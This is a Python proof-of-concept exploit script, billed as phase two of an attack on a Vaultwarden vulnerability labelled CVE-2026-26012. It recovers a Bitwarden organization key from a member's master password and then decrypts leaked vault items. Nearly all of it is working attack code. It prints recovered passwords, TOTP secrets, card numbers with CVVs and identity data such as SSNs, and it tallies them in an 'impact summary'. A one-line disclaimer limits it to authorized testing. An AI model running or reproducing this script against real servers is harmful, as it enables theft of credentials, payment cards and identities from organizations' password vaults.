#!/usr/bin/env python3
"""
CVE-2026-26012 — Phase 2: Organization Key Recovery & Cipher Decryption
========================================================================

This script completes the exploitation chain by:
  1. Retrieving the encrypted org key (any member already has it)
  2. Deriving the decryption chain from the master password
  3. Decrypting the leaked ciphers from Phase 1

Bitwarden/Vaultwarden encryption model:
  Master Password + Email
      → (PBKDF2 or Argon2) → Master Key
      → (HKDF-Expand)       → Stretched Key (encKey 32B || macKey 32B)
      → (AES-256-CBC)       → User Symmetric Key  [from /api/sync profile.key]
      → (AES-256-CBC)       → RSA Private Key      [from /api/sync profile.privateKey]
      → (RSA-OAEP-SHA1)     → Organization Key     [from /api/sync profile.organizations[].key]
      → (AES-256-CBC)       → Decrypted cipher data

Key insight: the organization key is shared with ALL members. The collection
access control is purely server-side. Any member who has the org key can
decrypt any cipher in the org — the CVE provides the missing ciphers.

Requirements:
  pip install cryptography
  pip install argon2-cffi   (optional, only if KDF is Argon2id)

Usage:
  # Full chain: fetch keys + decrypt leaked export
  python3 poc_decrypt.py \
      --url https://vw.example.com \
      --token "eyJhbG..." \
      --email user@example.com \
      --master-password "MyPassword" \
      --org-id "org-uuid" \
      --leaked-json results.json

  # Just decrypt (if you already have the org key in hex)
  python3 poc_decrypt.py \
      --org-key-hex "aabbccdd..." \
      --leaked-json results.json

Disclaimer: Authorized security testing only.
"""

import argparse
import json
import sys
import base64
import hashlib
import hmac as hmac_mod
import ssl
import urllib.request
import urllib.error
import os
from typing import Tuple, Optional

from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from cryptography.hazmat.primitives import padding, hashes, serialization
from cryptography.hazmat.primitives.asymmetric import padding as asym_padding
from cryptography.hazmat.primitives.kdf.hkdf import HKDFExpand

try:
    import argon2.low_level
    HAS_ARGON2 = True
except ImportError:
    HAS_ARGON2 = False


# ═════════════════════════════════════════════
# 1. EncString Parser
# ═════════════════════════════════════════════

# Bitwarden EncString types:
#   0 = AES-256-CBC (no HMAC — legacy, rare)
#   1 = AES-128-CBC + HMAC-SHA256
#   2 = AES-256-CBC + HMAC-SHA256 (most common for cipher fields)
#   3 = RSA-2048-OAEP-SHA256
#   4 = RSA-2048-OAEP-SHA1 (used for org key encryption)

class EncString:
    """Parsed Bitwarden encrypted string."""

    def __init__(self, raw: str):
        self.raw = raw
        self.enc_type = None
        self.iv = None
        self.ct = None
        self.mac = None
        self._parse(raw)

    def _parse(self, raw: str):
        if not raw or not isinstance(raw, str):
            raise ValueError(f"Invalid EncString: {raw!r}")

        # Format: "TYPE.DATA" where DATA is "IV|CT|MAC" or just "CT"
        dot_idx = raw.index(".")
        self.enc_type = int(raw[:dot_idx])
        data = raw[dot_idx + 1:]

        if self.enc_type in (0, 1, 2, 5, 6):
            # Symmetric: IV|CT|MAC
            parts = data.split("|")
            self.iv = base64.b64decode(parts[0])
            self.ct = base64.b64decode(parts[1])
            if len(parts) > 2 and parts[2]:
                self.mac = base64.b64decode(parts[2])

        elif self.enc_type in (3, 4):
            # Asymmetric: just CT
            self.ct = base64.b64decode(data)

        else:
            raise ValueError(f"Unknown EncString type: {self.enc_type}")

    def __repr__(self):
        return f"EncString(type={self.enc_type}, ct={len(self.ct)}B)"


# ═════════════════════════════════════════════
# 2. Crypto Operations
# ═════════════════════════════════════════════

def decrypt_aes_cbc(ct: bytes, iv: bytes, enc_key: bytes,
                     mac_key: bytes = None, mac: bytes = None) -> bytes:
    """Decrypt AES-256-CBC with optional HMAC-SHA256 verification."""

    # Verify HMAC if present
    if mac and mac_key:
        computed = hmac_mod.new(mac_key, iv + ct, hashlib.sha256).digest()
        if not hmac_mod.compare_digest(computed, mac):
            raise ValueError("HMAC verification failed — wrong key or corrupted data")

    cipher = Cipher(algorithms.AES(enc_key), modes.CBC(iv))
    decryptor = cipher.decryptor()
    padded = decryptor.update(ct) + decryptor.finalize()

    # Remove PKCS7 padding
    unpadder = padding.PKCS7(128).unpadder()
    return unpadder.update(padded) + unpadder.finalize()


def decrypt_enc_string(enc_str: EncString, enc_key: bytes, mac_key: bytes) -> bytes:
    """Decrypt a symmetric EncString (type 0, 1, 2)."""
    if enc_str.enc_type not in (0, 1, 2):
        raise ValueError(f"Expected symmetric EncString, got type {enc_str.enc_type}")

    return decrypt_aes_cbc(
        ct=enc_str.ct,
        iv=enc_str.iv,
        enc_key=enc_key,
        mac_key=mac_key,
        mac=enc_str.mac,
    )


def decrypt_rsa_oaep(ct: bytes, private_key, sha_version: int = 1) -> bytes:
    """Decrypt RSA-OAEP (SHA-1 or SHA-256)."""
    if sha_version == 1:
        hash_algo = hashes.SHA1()
    else:
        hash_algo = hashes.SHA256()

    return private_key.decrypt(
        ct,
        asym_padding.OAEP(
            mgf=asym_padding.MGF1(algorithm=hash_algo),
            algorithm=hash_algo,
            label=None,
        ),
    )


def decrypt_enc_string_rsa(enc_str: EncString, private_key) -> bytes:
    """Decrypt an asymmetric EncString (type 3, 4)."""
    sha_version = 1 if enc_str.enc_type == 4 else 256
    return decrypt_rsa_oaep(enc_str.ct, private_key, sha_version)


# ═════════════════════════════════════════════
# 3. Key Derivation Chain
# ═════════════════════════════════════════════

def derive_master_key(password: str, email: str,
                      kdf_type: int, kdf_iterations: int,
                      kdf_memory: int = None,
                      kdf_parallelism: int = None) -> bytes:
    """
    Derive the master key from master password + email.
    KDF type 0 = PBKDF2-SHA256
    KDF type 1 = Argon2id
    """
    if kdf_type == 0:
        return hashlib.pbkdf2_hmac(
            "sha256",
            password.encode("utf-8"),
            email.lower().encode("utf-8"),
            kdf_iterations,
            dklen=32,
        )
    elif kdf_type == 1:
        if not HAS_ARGON2:
            print("[!] Argon2id KDF detected but argon2-cffi is not installed.")
            print("    Install with: pip install argon2-cffi")
            sys.exit(1)

        # Salt = SHA-256 of lowercase email (raw 32 bytes)
        salt = hashlib.sha256(email.lower().encode("utf-8")).digest()

        # CRITICAL: Bitwarden API returns kdfMemory in MiB.
        # argon2-cffi memory_cost is in KiB. Must convert: MiB * 1024 = KiB
        memory_kib = (kdf_memory or 64) * 1024

        raw = argon2.low_level.hash_secret_raw(
            secret=password.encode("utf-8"),
            salt=salt,
            time_cost=kdf_iterations,
            memory_cost=memory_kib,
            parallelism=kdf_parallelism or 4,
            hash_len=32,
            type=argon2.low_level.Type.ID,
        )
        return raw
    else:
        raise ValueError(f"Unknown KDF type: {kdf_type}")


def stretch_key_hkdf(master_key: bytes) -> Tuple[bytes, bytes]:
    """
    Modern stretching: HKDF-Expand-SHA256 with info="enc"/"mac".
    Used by Bitwarden clients since ~2021+.
    """
    enc_key = HKDFExpand(
        algorithm=hashes.SHA256(), length=32, info=b"enc"
    ).derive(master_key)

    mac_key = HKDFExpand(
        algorithm=hashes.SHA256(), length=32, info=b"mac"
    ).derive(master_key)

    return enc_key, mac_key


def stretch_key_legacy(master_key: bytes) -> Tuple[bytes, bytes]:
    """
    Legacy stretching: HMAC-based key expansion.
    Used by older Bitwarden clients (pre-HKDF).
    """
    enc_key = hmac_mod.new(master_key, master_key + b"\x01", hashlib.sha256).digest()
    mac_key = hmac_mod.new(master_key, enc_key + b"\x02", hashlib.sha256).digest()
    return enc_key, mac_key


def try_decrypt_user_key(encrypted_key_str: str, master_key: bytes,
                          debug: bool = False) -> Tuple[bytes, bytes, str]:
    """
    Try multiple strategies to decrypt the user symmetric key.
    Returns (enc_key, mac_key, strategy_name) on success.
    Raises ValueError if all strategies fail.

    Strategies tried in order:
      1. HKDF-Expand stretched key (modern Bitwarden)
      2. Legacy HMAC-based stretched key (older Bitwarden)
      3. Raw master key as enc_key, no MAC (very old accounts, type 0)
      4. HKDF stretched key, skip HMAC verification (fallback)
      5. Legacy stretched key, skip HMAC verification (fallback)
    """
    enc_str = EncString(encrypted_key_str)

    if debug:
        print(f"    [debug] User key EncString type: {enc_str.enc_type}")
        print(f"    [debug] IV:  {enc_str.iv.hex()[:16]}... ({len(enc_str.iv)}B)")
        print(f"    [debug] CT:  {enc_str.ct.hex()[:16]}... ({len(enc_str.ct)}B)")
        print(f"    [debug] MAC: {enc_str.mac.hex()[:16] if enc_str.mac else 'None'}..."
              f" ({len(enc_str.mac) if enc_str.mac else 0}B)")

    strategies = []

    # Strategy 1: HKDF stretch (modern)
    hkdf_enc, hkdf_mac = stretch_key_hkdf(master_key)
    strategies.append(("HKDF-Expand (modern)", hkdf_enc, hkdf_mac, True))

    # Strategy 2: Legacy HMAC stretch
    legacy_enc, legacy_mac = stretch_key_legacy(master_key)
    strategies.append(("HMAC-based stretch (legacy)", legacy_enc, legacy_mac, True))

    # Strategy 3: Raw master key (very old accounts, usually type 0)
    strategies.append(("Raw master key (no stretch)", master_key, None, False))

    # Strategy 4 & 5: Same as 1 & 2 but skip HMAC (last resort)
    strategies.append(("HKDF-Expand, skip HMAC", hkdf_enc, hkdf_mac, False))
    strategies.append(("HMAC-stretch, skip HMAC", legacy_enc, legacy_mac, False))

    errors = []
    for name, enc_key, mac_key, verify_hmac in strategies:
        try:
            if debug:
                print(f"    [debug] Trying: {name}")
                print(f"    [debug]   enc_key: {enc_key.hex()[:16]}...")
                if mac_key:
                    print(f"    [debug]   mac_key: {mac_key.hex()[:16]}...")

            # Determine if we should verify HMAC
            effective_mac = enc_str.mac if (verify_hmac and mac_key) else None
            effective_mac_key = mac_key if (verify_hmac and enc_str.mac) else None

            raw = decrypt_aes_cbc(
                ct=enc_str.ct,
                iv=enc_str.iv,
                enc_key=enc_key,
                mac_key=effective_mac_key,
                mac=effective_mac,
            )

            # Validate the decrypted key length
            if len(raw) == 64:
                result_enc, result_mac = raw[:32], raw[32:]
            elif len(raw) == 32:
                result_enc, result_mac = raw, raw
            else:
                raise ValueError(f"Unexpected decrypted key length: {len(raw)} bytes")

            # Quick sanity check: try to use the key to decrypt something small
            # (the key should look like random bytes, not padding errors)
            if all(b == 0 for b in raw):
                raise ValueError("Decrypted key is all zeros")

            if debug:
                print(f"    [debug]   SUCCESS → {len(raw)}B key")

            return result_enc, result_mac, name

        except Exception as e:
            errors.append((name, str(e)))
            if debug:
                print(f"    [debug]   FAILED: {e}")
            continue

    # All strategies failed
    print("\n[!] All key derivation strategies failed:")
    for name, err in errors:
        print(f"    ✗ {name}: {err}")
    print("\n    Possible causes:")
    print("    1. Incorrect master password")
    print("    2. Incorrect email (case matters for the salt)")
    print("    3. Account uses an unsupported KDF configuration")
    print("    4. The profile.key was re-encrypted with a method not yet supported")
    print("\n    Try with --debug for detailed diagnostics")
    raise ValueError("Could not decrypt user symmetric key with any known strategy")


def decrypt_user_private_key(encrypted_pk_str: str,
                              user_enc: bytes,
                              user_mac: bytes):
    """
    Decrypt the user's RSA private key from profile.privateKey.
    Returns an RSA private key object.
    """
    enc_str = EncString(encrypted_pk_str)
    der_bytes = decrypt_enc_string(enc_str, user_enc, user_mac)

    return serialization.load_der_private_key(der_bytes, password=None)


def decrypt_org_key(encrypted_org_key_str: str,
                    private_key) -> Tuple[bytes, bytes]:
    """
    Decrypt the organization key from profile.organizations[].key.
    This is RSA-OAEP encrypted (type 4 = SHA-1).
    Returns (org_enc_key, org_mac_key) — 32 bytes each.
    """
    enc_str = EncString(encrypted_org_key_str)
    raw = decrypt_enc_string_rsa(enc_str, private_key)

    if len(raw) == 64:
        return raw[:32], raw[32:]
    else:
        raise ValueError(f"Unexpected org key length: {len(raw)} bytes")


# ═════════════════════════════════════════════
# 4. Cipher Decryption
# ═════════════════════════════════════════════

def safe_decrypt_field(value: Optional[str], enc_key: bytes, mac_key: bytes) -> Optional[str]:
    """Attempt to decrypt a single cipher field. Returns None on failure."""
    if not value or not isinstance(value, str):
        return None
    try:
        enc_str = EncString(value)
        raw = decrypt_enc_string(enc_str, enc_key, mac_key)
        return raw.decode("utf-8", errors="replace")
    except Exception as e:
        return f"[DECRYPT_ERROR: {e}]"


def decrypt_cipher(cipher: dict, org_enc: bytes, org_mac: bytes) -> dict:
    """Decrypt all fields of a single cipher using the org key."""
    result = {
        "id": cipher.get("id", cipher.get("Id")),
        "type": cipher.get("type", cipher.get("Type")),
        "collectionIds": cipher.get("collectionIds", cipher.get("CollectionIds", [])),
        "revisionDate": cipher.get("revisionDate", cipher.get("RevisionDate")),
    }

    # Decrypt top-level fields
    result["name"] = safe_decrypt_field(
        cipher.get("name", cipher.get("Name")), org_enc, org_mac
    )
    result["notes"] = safe_decrypt_field(
        cipher.get("notes", cipher.get("Notes")), org_enc, org_mac
    )

    # Decrypt custom fields
    fields = cipher.get("fields", cipher.get("Fields")) or []
    result["fields"] = []
    for f in fields:
        result["fields"].append({
            "name": safe_decrypt_field(
                f.get("name", f.get("Name")), org_enc, org_mac
            ),
            "value": safe_decrypt_field(
                f.get("value", f.get("Value")), org_enc, org_mac
            ),
            "type": f.get("type", f.get("Type")),
        })

    # Type-specific decryption
    cipher_type = result["type"]

    if cipher_type == 1:  # Login
        login = cipher.get("login", cipher.get("Login")) or {}
        result["login"] = {
            "username": safe_decrypt_field(
                login.get("username", login.get("Username")), org_enc, org_mac
            ),
            "password": safe_decrypt_field(
                login.get("password", login.get("Password")), org_enc, org_mac
            ),
            "totp": safe_decrypt_field(
                login.get("totp", login.get("Totp")), org_enc, org_mac
            ),
        }
        # Decrypt URIs
        uris = login.get("uris", login.get("Uris")) or []
        result["login"]["uris"] = []
        for u in uris:
            result["login"]["uris"].append(
                safe_decrypt_field(
                    u.get("uri", u.get("Uri")), org_enc, org_mac
                )
            )

    elif cipher_type == 2:  # Secure Note
        # Notes are already in the top-level "notes" field
        pass

    elif cipher_type == 3:  # Card
        card = cipher.get("card", cipher.get("Card")) or {}
        result["card"] = {
            "cardholderName": safe_decrypt_field(
                card.get("cardholderName", card.get("CardholderName")), org_enc, org_mac
            ),
            "brand": safe_decrypt_field(
                card.get("brand", card.get("Brand")), org_enc, org_mac
            ),
            "number": safe_decrypt_field(
                card.get("number", card.get("Number")), org_enc, org_mac
            ),
            "expMonth": safe_decrypt_field(
                card.get("expMonth", card.get("ExpMonth")), org_enc, org_mac
            ),
            "expYear": safe_decrypt_field(
                card.get("expYear", card.get("ExpYear")), org_enc, org_mac
            ),
            "code": safe_decrypt_field(
                card.get("code", card.get("Code")), org_enc, org_mac
            ),
        }

    elif cipher_type == 4:  # Identity
        identity = cipher.get("identity", cipher.get("Identity")) or {}
        id_fields = [
            "title", "firstName", "middleName", "lastName",
            "company", "email", "phone", "ssn", "passportNumber",
            "licenseNumber", "address1", "address2", "address3",
            "city", "state", "postalCode", "country", "username",
        ]
        result["identity"] = {}
        for field in id_fields:
            # Handle both camelCase and PascalCase
            pascal = field[0].upper() + field[1:]
            val = identity.get(field, identity.get(pascal))
            result["identity"][field] = safe_decrypt_field(val, org_enc, org_mac)

    # Attachments (metadata only — downloading requires separate API calls)
    attachments = cipher.get("attachments", cipher.get("Attachments")) or []
    if attachments:
        result["attachments"] = []
        for att in attachments:
            result["attachments"].append({
                "id": att.get("id", att.get("Id")),
                "fileName": safe_decrypt_field(
                    att.get("fileName", att.get("FileName")), org_enc, org_mac
                ),
                "size": att.get("size", att.get("Size")),
                "sizeName": att.get("sizeName", att.get("SizeName")),
            })

    return result


# ═════════════════════════════════════════════
# 5. HTTP Client (reused from Phase 1)
# ═════════════════════════════════════════════

class VWClient:
    def __init__(self, base_url: str, verify_ssl: bool = True):
        self.base_url = base_url.rstrip("/")
        self.auth_header = None
        self.cookie_header = None
        self.ssl_ctx = None
        if not verify_ssl:
            self.ssl_ctx = ssl.create_default_context()
            self.ssl_ctx.check_hostname = False
            self.ssl_ctx.verify_mode = ssl.CERT_NONE

    def set_bearer_token(self, token: str):
        token = token.strip()
        if token.lower().startswith("bearer "):
            token = token[7:]
        self.auth_header = f"Bearer {token}"

    def set_cookie(self, cookie: str):
        self.cookie_header = cookie.strip()

    def get(self, path: str) -> dict:
        url = f"{self.base_url}{path}"
        req = urllib.request.Request(url)
        req.add_header("Accept", "application/json")
        if self.auth_header:
            req.add_header("Authorization", self.auth_header)
        if self.cookie_header:
            req.add_header("Cookie", self.cookie_header)

        kwargs = {"context": self.ssl_ctx} if self.ssl_ctx else {}
        try:
            with urllib.request.urlopen(req, **kwargs) as resp:
                body = resp.read()
                if not body or len(body.strip()) == 0:
                    raise RuntimeError("Empty response")
                decoded = body.decode("utf-8", errors="replace")
                if decoded.strip().startswith("<"):
                    raise RuntimeError("Got HTML instead of JSON (invalid auth?)")
                return json.loads(decoded)
        except urllib.error.HTTPError as e:
            body = e.read().decode(errors="replace")
            raise RuntimeError(f"HTTP {e.code}: {body[:300]}")


# ═════════════════════════════════════════════
# 6. Key Recovery from API
# ═════════════════════════════════════════════

def fetch_sync_data(client: VWClient) -> dict:
    """Fetch /api/sync which contains all encrypted keys."""
    return client.get("/api/sync?excludeDomains=true")


def fetch_prelogin(client: VWClient, email: str) -> dict:
    """Fetch KDF parameters."""
    url = f"{client.base_url}/api/accounts/prelogin"
    data = json.dumps({"email": email}).encode()
    req = urllib.request.Request(url, data=data, method="POST")
    req.add_header("Content-Type", "application/json")
    kwargs = {"context": client.ssl_ctx} if client.ssl_ctx else {}
    with urllib.request.urlopen(req, **kwargs) as resp:
        return json.loads(resp.read())


def recover_org_key(client: VWClient, email: str, master_password: str,
                    org_id: str, debug: bool = False) -> Tuple[bytes, bytes]:
    """
    Full key recovery chain:
      master_password → master_key → [stretch] → user_key → RSA_key → org_key
    """
    print("\n[*] === Key Recovery Chain ===\n")

    # Step 1: Get KDF parameters
    print("[1/6] Fetching KDF parameters...")
    prelogin = fetch_prelogin(client, email)
    kdf_type = prelogin.get("kdf", prelogin.get("Kdf", 0))
    kdf_iter = prelogin.get("kdfIterations", prelogin.get("KdfIterations", 600000))
    kdf_mem = prelogin.get("kdfMemory", prelogin.get("KdfMemory"))
    kdf_par = prelogin.get("kdfParallelism", prelogin.get("KdfParallelism"))
    kdf_names = {0: "PBKDF2-SHA256", 1: "Argon2id"}
    print(f"       KDF: {kdf_names.get(kdf_type, f'unknown({kdf_type})')}, "
          f"iterations: {kdf_iter}"
          f"{f', memory: {kdf_mem} MiB' if kdf_mem else ''}"
          f"{f', parallelism: {kdf_par}' if kdf_par else ''}")

    if debug:
        print(f"    [debug] Raw prelogin response: {json.dumps(prelogin, indent=2)}")

    # Step 2: Derive master key
    print("[2/6] Deriving master key...")
    master_key = derive_master_key(master_password, email, kdf_type, kdf_iter, kdf_mem, kdf_par)
    print(f"       Master key: {master_key[:4].hex()}...{master_key[-4:].hex()} "
          f"({len(master_key)} bytes)")

    # Step 3: Fetch encrypted keys from /api/sync
    print("[3/6] Fetching encrypted keys from /api/sync...")
    sync = fetch_sync_data(client)

    profile = sync.get("profile", sync.get("Profile", {}))
    enc_user_key = profile.get("key", profile.get("Key"))
    enc_private_key = profile.get("privateKey", profile.get("PrivateKey"))
    organizations = profile.get("organizations", profile.get("Organizations", []))

    if debug:
        print(f"    [debug] profile.key (first 80 chars): {enc_user_key[:80] if enc_user_key else 'None'}...")
        print(f"    [debug] profile.privateKey length: {len(enc_private_key) if enc_private_key else 'None'}")
        print(f"    [debug] Organizations count: {len(organizations)}")

    if not enc_user_key:
        print("[!] Could not find encrypted user key in sync response")
        sys.exit(1)
    if not enc_private_key:
        print("[!] Could not find encrypted private key in sync response")
        sys.exit(1)

    # Find the target org
    target_org = None
    for org in organizations:
        oid = org.get("id", org.get("Id", ""))
        if oid == org_id:
            target_org = org
            break

    if not target_org:
        print(f"[!] Organization {org_id} not found in user's profile")
        print(f"    Available orgs:")
        for org in organizations:
            oid = org.get("id", org.get("Id"))
            oname = org.get("name", org.get("Name"))
            print(f"      - {oname} ({oid})")
        sys.exit(1)

    enc_org_key = target_org.get("key", target_org.get("Key"))
    org_name = target_org.get("name", target_org.get("Name", "?"))
    print(f"       Organization: {org_name}")
    print(f"       Found encrypted user key, private key, and org key")

    # Step 4: Decrypt user symmetric key (multi-strategy)
    print("[4/6] Decrypting user symmetric key...")
    user_enc, user_mac, strategy = try_decrypt_user_key(enc_user_key, master_key, debug=debug)
    print(f"       Strategy:     {strategy}")
    print(f"       User enc key: {user_enc[:4].hex()}... ({len(user_enc)} bytes)")
    print(f"       User mac key: {user_mac[:4].hex()}... ({len(user_mac)} bytes)")

    # Step 5: Decrypt RSA private key
    print("[5/6] Decrypting RSA private key...")
    try:
        rsa_private = decrypt_user_private_key(enc_private_key, user_enc, user_mac)
    except ValueError as e:
        # If HMAC fails on the private key too, try without HMAC
        if "HMAC" in str(e):
            print(f"       HMAC failed on private key, retrying without verification...")
            enc_str = EncString(enc_private_key)
            der_bytes = decrypt_aes_cbc(
                ct=enc_str.ct, iv=enc_str.iv,
                enc_key=user_enc, mac_key=None, mac=None,
            )
            rsa_private = serialization.load_der_private_key(der_bytes, password=None)
        else:
            raise

    pk_size = rsa_private.key_size
    print(f"       RSA private key: {pk_size}-bit")

    # Step 6: Decrypt org key with RSA
    print("[6/6] Decrypting organization key...")
    org_enc, org_mac = decrypt_org_key(enc_org_key, rsa_private)
    print(f"       Org enc key: {org_enc[:4].hex()}... ({len(org_enc)} bytes)")
    print(f"       Org mac key: {org_mac[:4].hex()}... ({len(org_mac)} bytes)")

    print(f"\n[+] Organization key recovered successfully!")
    print(f"    Org key (hex): {(org_enc + org_mac).hex()}")

    return org_enc, org_mac


# ═════════════════════════════════════════════
# 7. Pretty Printer
# ═════════════════════════════════════════════

TYPE_NAMES = {1: "Login", 2: "SecureNote", 3: "Card", 4: "Identity"}


def print_decrypted_cipher(cipher: dict, index: int):
    """Pretty-print a decrypted cipher."""
    ctype = cipher.get("type", "?")
    type_str = TYPE_NAMES.get(ctype, f"Unknown({ctype})")

    print(f"\n  ┌─ [{index}] {type_str}: {cipher.get('name', '?')}")
    print(f"  │  ID: {cipher.get('id', '?')}")
    print(f"  │  Collections: {cipher.get('collectionIds', [])}")

    if cipher.get("notes"):
        notes = cipher["notes"]
        if len(notes) > 100:
            notes = notes[:100] + "..."
        print(f"  │  Notes: {notes}")

    if ctype == 1 and cipher.get("login"):
        login = cipher["login"]
        print(f"  │  ┌─ Login")
        if login.get("uris"):
            for uri in login["uris"]:
                if uri:
                    print(f"  │  │  URL:      {uri}")
        print(f"  │  │  Username: {login.get('username', '—')}")
        print(f"  │  │  Password: {login.get('password', '—')}")
        if login.get("totp"):
            print(f"  │  │  TOTP:     {login['totp']}")
        print(f"  │  └─")

    elif ctype == 3 and cipher.get("card"):
        card = cipher["card"]
        print(f"  │  ┌─ Card")
        print(f"  │  │  Holder: {card.get('cardholderName', '—')}")
        print(f"  │  │  Brand:  {card.get('brand', '—')}")
        print(f"  │  │  Number: {card.get('number', '—')}")
        print(f"  │  │  Exp:    {card.get('expMonth', '?')}/{card.get('expYear', '?')}")
        print(f"  │  │  CVV:    {card.get('code', '—')}")
        print(f"  │  └─")

    elif ctype == 4 and cipher.get("identity"):
        ident = cipher["identity"]
        print(f"  │  ┌─ Identity")
        for k, v in ident.items():
            if v and v != "[DECRYPT_ERROR":
                print(f"  │  │  {k}: {v}")
        print(f"  │  └─")

    if cipher.get("fields"):
        print(f"  │  ┌─ Custom fields")
        for f in cipher["fields"]:
            fname = f.get("name", "?")
            fval = f.get("value", "—")
            ftype = f.get("type", 0)
            ftype_names = {0: "Text", 1: "Hidden", 2: "Boolean", 3: "Linked"}
            print(f"  │  │  [{ftype_names.get(ftype, '?')}] {fname} = {fval}")
        print(f"  │  └─")

    if cipher.get("attachments"):
        print(f"  │  Attachments:")
        for att in cipher["attachments"]:
            print(f"  │    - {att.get('fileName', '?')} ({att.get('sizeName', '?')})")

    print(f"  └─")


# ═════════════════════════════════════════════
# 8. Main
# ═════════════════════════════════════════════

def main():
    banner = r"""
   ╔══════════════════════════════════════════════════════════╗
   ║   CVE-2026-26012 — Phase 2: Decrypt Leaked Ciphers      ║
   ║   Org Key Recovery + AES-256-CBC Decryption              ║
   ╚══════════════════════════════════════════════════════════╝
    """
    print(banner)

    parser = argparse.ArgumentParser(
        description="CVE-2026-26012 Phase 2: Org key recovery & cipher decryption",
        formatter_class=argparse.RawDescriptionHelpFormatter,
    )

    # Input: leaked ciphers
    parser.add_argument("--leaked-json", required=True,
                        help="JSON file from Phase 1 (--output results.json)")

    # Method A: Full chain (API + master password)
    chain = parser.add_argument_group("Method A: Full recovery chain (API + master password)")
    chain.add_argument("--url", help="Vaultwarden base URL")
    chain.add_argument("--token", help="Bearer token")
    chain.add_argument("--cookie", help="Session cookie")
    chain.add_argument("--email", help="Account email")
    chain.add_argument("--master-password", help="Master password (for key derivation)")
    chain.add_argument("--org-id", help="Target organization UUID")
    chain.add_argument("--no-verify-ssl", action="store_true",
                        help="Skip SSL verification")

    # Method B: Direct org key
    direct = parser.add_argument_group("Method B: Direct org key (skip recovery)")
    direct.add_argument("--org-key-hex",
                        help="Organization key as hex (128 hex chars = 64 bytes: enc||mac)")

    # Output
    parser.add_argument("--output", help="Save decrypted results to JSON file")
    parser.add_argument("--max-display", type=int, default=30,
                        help="Max ciphers to display (default: 30)")
    parser.add_argument("--debug", action="store_true",
                        help="Show detailed intermediate values for troubleshooting")

    args = parser.parse_args()

    # ── Load leaked ciphers ──
    print(f"[*] Loading leaked ciphers from {args.leaked_json}...")
    with open(args.leaked_json, "r") as f:
        leaked_data = json.load(f)

    # Handle both Phase 1 export format and raw cipher arrays
    if isinstance(leaked_data, dict):
        ciphers = leaked_data.get("leaked_ciphers", [])
        print(f"    Source: {leaked_data.get('target', '?')}")
        print(f"    Org:    {leaked_data.get('organization_id', '?')}")
    elif isinstance(leaked_data, list):
        ciphers = leaked_data
    else:
        print("[!] Unrecognized JSON format")
        sys.exit(1)

    print(f"    Loaded {len(ciphers)} cipher(s) to decrypt")

    if not ciphers:
        print("[!] No ciphers to decrypt.")
        sys.exit(0)

    # ── Obtain org key ──
    org_enc = None
    org_mac = None

    if args.org_key_hex:
        # Method B: direct key
        print(f"\n[*] Using provided organization key")
        raw = bytes.fromhex(args.org_key_hex)
        if len(raw) != 64:
            print(f"[!] Org key must be 64 bytes (128 hex chars), got {len(raw)}")
            sys.exit(1)
        org_enc, org_mac = raw[:32], raw[32:]
        print(f"    Org enc key: {org_enc[:4].hex()}...")
        print(f"    Org mac key: {org_mac[:4].hex()}...")

    elif args.url and args.master_password and args.email:
        # Method A: full chain
        client = VWClient(args.url, verify_ssl=not args.no_verify_ssl)
        if args.token:
            client.set_bearer_token(args.token)
        elif args.cookie:
            client.set_cookie(args.cookie)
        else:
            print("[!] Need --token or --cookie for API access")
            sys.exit(1)

        org_id = args.org_id
        if not org_id:
            # Try to get from the leaked JSON
            org_id = leaked_data.get("organization_id") if isinstance(leaked_data, dict) else None
        if not org_id:
            print("[!] --org-id is required for Method A")
            sys.exit(1)

        org_enc, org_mac = recover_org_key(client, args.email, args.master_password, org_id,
                                            debug=args.debug)

    else:
        print("[!] Provide either:")
        print("    Method A: --url + --token + --email + --master-password + --org-id")
        print("    Method B: --org-key-hex")
        sys.exit(1)

    # ── Decrypt all ciphers ──
    print(f"\n[*] Decrypting {len(ciphers)} cipher(s)...\n")

    decrypted = []
    errors = 0
    for i, cipher in enumerate(ciphers):
        try:
            dec = decrypt_cipher(cipher, org_enc, org_mac)
            decrypted.append(dec)
        except Exception as e:
            errors += 1
            dec = {
                "id": cipher.get("id", cipher.get("Id")),
                "error": str(e),
            }
            decrypted.append(dec)

    # ── Display results ──
    print(f"{'='*60}")
    print(f"  DECRYPTION RESULTS")
    print(f"{'='*60}")
    print(f"  Total:     {len(ciphers)}")
    print(f"  Decrypted: {len(decrypted) - errors}")
    print(f"  Errors:    {errors}")
    print(f"{'='*60}")

    # Count by type
    type_counts = {}
    for d in decrypted:
        if "error" not in d:
            t = TYPE_NAMES.get(d.get("type"), "Unknown")
            type_counts[t] = type_counts.get(t, 0) + 1

    print(f"\n  Breakdown:")
    for t, count in sorted(type_counts.items()):
        print(f"    {t}: {count}")

    # Print decrypted ciphers
    display_count = min(len(decrypted), args.max_display)
    for i, dec in enumerate(decrypted[:display_count], 1):
        if "error" in dec:
            print(f"\n  [{i}] ERROR: {dec['error']} (cipher {dec.get('id', '?')})")
        else:
            print_decrypted_cipher(dec, i)

    if len(decrypted) > display_count:
        print(f"\n  ... and {len(decrypted) - display_count} more. Use --output to see all.")

    # ── Export ──
    if args.output:
        export = {
            "vulnerability": "CVE-2026-26012",
            "phase": "decryption",
            "total_ciphers": len(ciphers),
            "decrypted_count": len(decrypted) - errors,
            "error_count": errors,
            "org_key_enc_hex": org_enc.hex(),
            "org_key_mac_hex": org_mac.hex(),
            "decrypted_ciphers": decrypted,
        }
        with open(args.output, "w") as f:
            json.dump(export, f, indent=2, ensure_ascii=False)
        print(f"\n[+] Decrypted results saved to {args.output}")

    # ── Summary ──
    passwords = sum(1 for d in decrypted if d.get("login", {}).get("password"))
    totps = sum(1 for d in decrypted if d.get("login", {}).get("totp"))
    cards = sum(1 for d in decrypted if d.get("card", {}).get("number"))

    print(f"\n{'='*60}")
    print(f"  IMPACT SUMMARY")
    print(f"{'='*60}")
    print(f"  Passwords recovered:     {passwords}")
    print(f"  TOTP secrets recovered:  {totps}")
    print(f"  Card numbers recovered:  {cards}")
    print(f"{'='*60}")

    print("\n[*] Done.")
    return 0


if __name__ == "__main__":
    sys.exit(main())
